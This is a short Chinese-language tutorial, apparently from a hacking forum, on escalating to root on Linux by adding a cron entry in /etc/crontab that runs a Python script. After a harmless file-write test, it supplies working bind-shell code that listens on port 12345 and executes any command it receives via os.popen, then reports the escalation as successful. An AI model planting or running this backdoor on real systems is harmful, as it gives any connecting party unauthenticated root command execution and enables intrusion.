利用系统 会周期性的去执行特定的指令来提权
在kali下面输入命令:
我们修改/etc/crontab 添加一行内容
nanhack.py 代码如下
- f_write = open('./nanhack.txt','w+')
- f_write.write('www.bihuo.cn')
- f_write.close()
复制代码
创建文件nanhack.txt,内容为www.bihuo.cn
等待一分钟,执行命令
- sudo find / -name "nanhack.txt"
复制代码 |
文件已经创建成功,因为是root权限执行,当前目录直接在root目录
提权方法:
我们替换nanhack.py 为其他内容
- import socket
- import os
- #AF_INET 代表ipv4 SOCK_STREAM==>tcp
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.bind(('0.0.0.0', 12345))
- s.listen(5)
- while True:
- conn, addr = s.accept()
- for i in range(10):
- cmd = conn.recv(1024)
- print(cmd)
- command = cmd.decode(encoding='utf-8')
- if command.startswith("cd"):
- os.chdir(command[2:].strip())
- result = os.getcwd()
- else:
- result = os.popen(command).read()
- if result:
- conn.send(result.encode('utf-8'))
- else:
- conn.send(b'ok')
复制代码
这段代码的内容为:监听12345端口,并等待其他机器链接,并执行传递的命令。
等待目标执行后,我们启动客户端 client.py
执行后
提权成功
|